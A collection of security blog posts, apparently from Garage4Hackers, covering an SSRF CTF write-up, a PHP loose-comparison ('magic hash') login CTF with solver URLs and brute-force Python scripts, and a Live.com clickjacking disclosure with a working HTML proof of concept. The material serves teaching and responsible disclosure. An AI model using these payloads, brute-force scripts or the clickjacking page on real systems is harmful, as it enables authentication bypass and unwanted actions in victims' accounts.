Overview
Recently, I was playing around with the Drupal CMS application code. Drupal is an open source CMS application widely used for blog posting purpose, Further details, to know more about Drupal
here. Open source application advantage being, the source code was at my disposal.
While fiddling around with the core Drupal Vendor Package I stumbled upon a very interesting vulnerability of XSS. Now the idea was to see how exactly an attacker can exploit this particular XSS to impact Drupal users at large.
So let me walk you through the technical process of discovery and impact assessment for the Drupal source code audit which lead to the discovery of XSS which can be used to hijack drupal accounts or to perform other malicious activity by an attacker.
Read more here : http://blog.securelayer7.net/core-drupal-8-0-0-beta14-xss-attack/
Thank you for reading my blog
At SecureLayer7, we continuously try to keep our customers updated with the latest threats which could affect their infrastructure and help them to secure their perimeter. More than often we devise attack scenarios and then brainstorm to block such attempts. During one such brainstorming session, we took a interesting detour to check a couple of our ideas.
For more detail : http://blog.securelayer7.net/malware-detection-adding-glastopf-juice-to-maldet-engine/
Thank you for reading
Hi,
I’ve posted completes Details about CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite on the following company link.
http://blog.securelayer7.net/cve-2015-2652-unauthenticated-file-upload-in-oracle-e-business-suite/
– S
The last time we organized CTF based on web application vulnerability i.e SSRF / XSPA. For those who are new to SSRF, please go through this slide http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities.
Just for the record next G4H Ranchoddas Webcast on Mobile Application and registration is open.
You can find CTF source code here: https://github.com/sandeepl337/Garage4hackers-March-2015-CTF-SSRF-XSPA .
On the CTF server we are running Internal application on port 80 and external application. The mission of the CTF was finding flag from the PHP file. The vulnerable external application is used to extract the title of any website.
Following Write up from Hai Au Huynh:
—— START ——
Firstable, put into url parameter “foobar”, we got “Caught exception: _(asfsafindex.php): failed to open stream: No such file or directory”=> the application parse our input as file and reading it.
So, it’s clear that next step we need to read the source code of application, we put into url parameter “index.php” and get the index.php source code.
The code is going to do something like this:
include(‘include/
Get the contents of url parameter input, if it has tittle tag, print out the title, if not print out the contents of input With the include/extractTitleLogic.php disclosure, we try to read the contents of include/extractTitleLogic.php but it contains the title tag, so we cannot read it. But fortunately, the include/index.php does
not, so we can read it out.
In source code of include/index.php, we get “// “The feeling that conversations and any data (whiteboard included)
are encrypted without having to mess around with complicated options and setup is a massive plus. It’s very very easy to use.” –
zorgalicious
// // You Found key! w00t!!
// Decrypt Blowfish following code and send CTF Flag to following email
// 49FE06DB9909C6FC6AE11D44F12CD3
The first quote seems very make sense, so we try to search for it, and it leads to this
http://www.bitwiseim.com/
So at this time, it’s very clearly that we can decrypt the Blowfish message at that site, and get the flag: Garage4Hacker Private Key:
0x33331337
—— END ——
Ho Ho Ho, Xmas challenge ended. This challenge was all about of bypassing login authentication. Obviously, it was funny challenge!! And the obvious reason was password md5 hash. A footnote was there in source code.
<!-- We are so generous, see we provided you password hash to login :) 0e100132199235687421930375421091 if(0e100132199235687421930375421091 == md5($_GET['pass'])) { // Simple PHP CODE Logic } ?> -->
Garage4Hackers Xmas Challenge is developed into PHP and it available to download for learning purpose.
Just a quick note: If you want to join G4H CTF team, then you PM me and checkout our last month Ranchoddas event
And I’m back to business, The main purpose of the CTF is to understand the PHP equal to (==) operator for comparing and even you can study strcmp function. If a developer uses equal to (==) operator without measuring the risk, then it can be profitable for attacker. However, attack can be carried in rare cases only. we’ve received some expected result and some unexpected results but at the end both are results
There was 4k + unique Hits on the CTF page in 24 Hrs, only few submission we’ve valid received.
Following is list of ninja, who solved the challenge in the time.
jinmo123 - Good Solution but not expected tlk ( https://twitter.com/tlk___ ) - Nice Solution, but Not expected stypr (https://stypr.com) - W00tt , expected solution Ajin Abraham - Nice Solution, but Not expected sagar popat - Nice Solution, but Not expected Sharath Unni - W00tt , expected solution
There was three way to solve this CTF and expected way to solve the challenge is to bypass authentication by using PHP equal to (==) operator. Brute forcing username is second easy way to solve the challenge and last way was monkey testing. ( Just kidding )
PHP CTF Code:
<?php error_reporting(0); $a = htmlentities($_GET['username']); $c = htmlentities($_GET['password']); $b = md5($c); if (!empty($a) AND !empty($b)) { // empty function made this CTF more easy if ("0e100132199235687421930375421091" == $b) { // vulnerable line if ($b ==="0e100132199235687421930375421091") { // To Avoiding some bugs and change behavior of CTF if ("133E-1337" === $a) {// To Avoiding some bugs and change behavior of CTF print "Flag : Garage4H4x0rFlagPhpFlag1337"; }else{ print "umm!! nice try dude :), oops! you don't know username"; } }else{ if ($a ==="0e100132199235687421930375421091") {// To Avoiding some bugs and change behavior of CTF print "umm!! nice try dude :), oops! "; }else{ if ("133E-1337" == $a) { // vulnerable line print "Flag : Garage4H4x0rFlagPhpFlag1337"; }else{ Print "Wrong Username"; } } } }else{ Print "wrong Password"; } } ?>
Here is some story about PHP operator and expected Behavior of PHP equal to operator.
Input | Output ------------------------- "0" == "0" | True "1" == "0" | False -------------------------
Unexpected Behavior of PHP equal to operator.
Input | Output ------------------------- "0e1" == "0" | True -------------------------
In detailed :
PHP consider it as scientific notation 0e1 = 0 * 10 ^ 1 and ANS is 0
<?php var_dump("0e1" == 0); ?>
Finding entry points Branch analysis from position: 0 Return found filename: /in/Pvj4s function name: (null) number of ops: 4 compiled vars: none line # * op fetch ext return operands --------------------------------------------------------------------------------- 2 0 > IS_EQUAL ~0 '0e1', 0 1 SEND_VAL ~0 2 DO_FCALL 1 'var_dump' 3 > RETURN 1
Here is the fun start, this is just plain text comparison and check out the following MD5 Hash, and most of developer use it as passwords.
var_dump(0e100132199235687421930375421091 == md5(urldecode('%02%a27%84'))); bool(true) // w00t :)
Another string :
'\x98-\xde\x1f'
// Submission by Beched (@ahack_ru)
try here : http://3v4l.org/NK5hp
In our check was too simple to bypass, because we haven’t put quotes around the hash. It made it to be integer, which causes expression to be true with any hash, which does not start with [1-9].
Here is bypass if we use quote around hash:
php > var_dump('0e100132199235687421930375421091'==md5("\x0e\xd7\xb6\xea")); // Submission by Beched (@ahack_ru) bool(true)
Try here : http://3v4l.org/M9dpY
Here is another simple example, which can be found on the internet.
http://3v4l.org/2vrMi
While testing this CTF there is MD5 collision found by Sharath Unni
0e100132199235687421930375421091 (Found in HTML source code ) 0e104142395260374396839196939683 (MD5 collision )
Both these hashes have the same plaintext equivalent: 26177715789 , you can decrypt MD5 here
http://www.md5online.org/
.
This was all about PHP Equal operator, now what is solution of this CTF.
Here is solution and you find many more ways:
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true http://162.208.48.16/?username=0e1&password=NOOPCJF&submit=Login&debug=true http://162.208.48.16/?username=0e2&password=26177715789&submit=Login&debug=true
Submission by jinmo123
http://162.208.48.16/?username=000&password=240610708&submit=Login#
Submission by tlk ( https://twitter.com/tlk___ )
Brute Force Script:
import requests s = requests.session() for i in range(255): r = s.get("http://162.208.48.16/?username="+chr(i)+"&password=QNKCDZO&submit=Login") print len(r.content), chr(i), i, "Wrong Username" in r.content We can see that only #, & and 0 not contains "Wrong Username". let's try to prepend '0' : r = s.get("http://162.208.48.16/?username=0"+chr(i)+"&password=QNKCDZO&submit=Login")
http://162.208.48.16/?username=0.0&password=QNKCDZO&submit=Login
Two Submission by stypr (https://stypr.com)
http://162.208.48.16/?username=0e57640477961333848717747276704&password=BRTKUJZ&submit=Login&debug=true http://162.208.48.16/?username=0x00&password=BRTKUJZ&submit=Login&debug=true
Submission by Ajin Abraham
import urllib2 with open("10k most common.txt","r") as f: url='http://162.208.48.16/?username=[X]&password=26177715789' no=0 for line in f: turl=url.replace("[X]",line).replace("\n","").replace("\r","") response = urllib2.urlopen(turl) html = response.read() dat=html[:50] no+=1 log= str(no)+" Username: "+ line +"Response: "+ dat if ("Wrong" in log): print no else: print log response.close()
URL:http://162.208.48.16/?username=-0&password=26177715789
Submission by Sagar Popat
http://162.208.48.16/?username=00&password=26177715789&submit=Login
Submission by Sharath Unni
http://162.208.48.16/?username=0e12323&password=26177715789&submit=Login
Thats all for today Thank you for reading .
Check out Recordings of Browser Crash Analysis By David Rude II aka Bannedit
On 7/29/13 I’ve reported Live.com XFO vulnerability to the Microsoft Security team and finally their investigation came to conclusion and fixed the bug. So, Here is details of bug and timeline of fixing bug. A year ago on the weekend, I started digging into MS services for bugs and this vulnerability seems to be more interesting to share on the Garage4Hackers.
The timeline of investigation of the bug : July 29, 2013 – April 16 , 2014.
The interesting part of the vulnerability all pages were protected for UI Addressing Attack and while doing testing, normally I test application on the all browsers. The weird part comes here, I was able to iframe the all the pages of Live.com including pre-authentication and post-authentication pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browser all pages functionality of XFO was working perfectly.
Random announcement , nothing do with this post : Check out recorded video of Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit
Note : Have look the same vulnerability on Facebook Application Installing
Obviously , you must be thinking why this thing is happening with Mozilla. After doing some research and consulting with G4H team , I’ve concluded, it may be issue with Gecko Engine. The test environment was win 7 , ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do reply on this thread.
Check out the following headers , XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6.
https://blu166.mail.live.com/m/?bfv=wm GET /m/?bfv=wm HTTP/1.1 Host: blu166.mail.live.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Wlp-StartTime: 29-07-2013 10:10:32 AM xxn: 22 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20 X-Powered-By: ASP.NET Content-Length: 3113 Date: Mon, 29 Jul 2013 10:10:32 GMT Connection: keep-alive Set-Cookie: bfv=wm; domain=.live.com; path=/ Set-Cookie: widecontext=X; path=/; secure Set-Cookie: domain=.live.com; path=/ Set-Cookie: xidseq=7; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/ Cache-Control: no-cache, no-store, must-revalidate, no-transform Pragma: no-cache Expires: -1, -1
Here is some print screen of basic operations of live.com (I would like to remind you , every page of live.com was vulnerable )
Attacker developed this page to attack on victim.
Composing Email :
Uploading Attachment :
Deleting Emails :
[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[IMG]
HTML POC , which i used sent to MS Security Team
<html> <!-- This Quick Developed POC , for testing purpose --!> <!-- Visit Garage4hackers.com --!> <head> <title> Live Mail Send Clickjacking - Garage4hackers.com </title> <style> iframe { width:800px; height:800px; position:absolute; top:0; left:0; filter:alpha(opacity=50); /* in real life opacity=0 */ opacity:0.5; } </style> </head> <body> <br> <br> <br> <br> <br> <br> <br> <br> <div><center>Bhag Milkha Bhag Competition</center></div> <center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center> <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe> <a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a> </body> </html>
Let me know if you have any question about this bug
– [S]
Yesterday night , while garage4hackers ranchoddas event was running. I’ve received a message from Microsoft Security Team with following statement. In regard, one vulnerability on multiple pages[Near about all pages of live] of Live.com / hotmail.com [Mobile version]
I hope they fix this very soon and I’ll share more details on the bug on Garage4hackers.com
Thank You
Sandeep
other a lot of technical problems we’re done! Thank you for the patience! I will re-record this and post on youtube in a few days and garage4hackers.com
Thank you
Dear all,
Garage4Hacker invites you to join us for a webinar titled Data, data, data! I can’t make bricks without clay by Gynvael Coldwind – Google Security Engineer and Dragon Sector Team Captain.
For Registration, please fill the following form.
https://docs.google.com/forms/d/1L3-…RlNdI/viewform
Reverse Engineering is an art more than science. From the realms of vulnerability discovery to debugging for internals, reverse engineers are a rare breed with the ability to think backwards in the chain of events. Discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation. With the growth of exploit development and rise of malware attacks, reverse engineering is becoming a key area to study.
==UPDATE==
Video stream: https://plus.google.com/events/c2puj…m01lo615eio8a8 or http://www.garage4hackers.com/pages.php?pageid=4
Questions / chat: #g4h @ irc.freenode.org (or via web: http://www.garage4hackers.com/pages.php?pageid=3)
–UPDATE–
What to expect:
The presentation would revolve more around the approaches taken in RE than usage of tools. It will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool – most of it can be applied on any architecture or operating system.
Examples of topics:
– how to start with an unknown architecture
– debugger scripting
– creating your own useful tools
– etc
Prerequisites:
– some reverse-engineering experience or general interest in reverse-engineering
– basic programming skills
– basic knowledge of how the CPU and operating systems work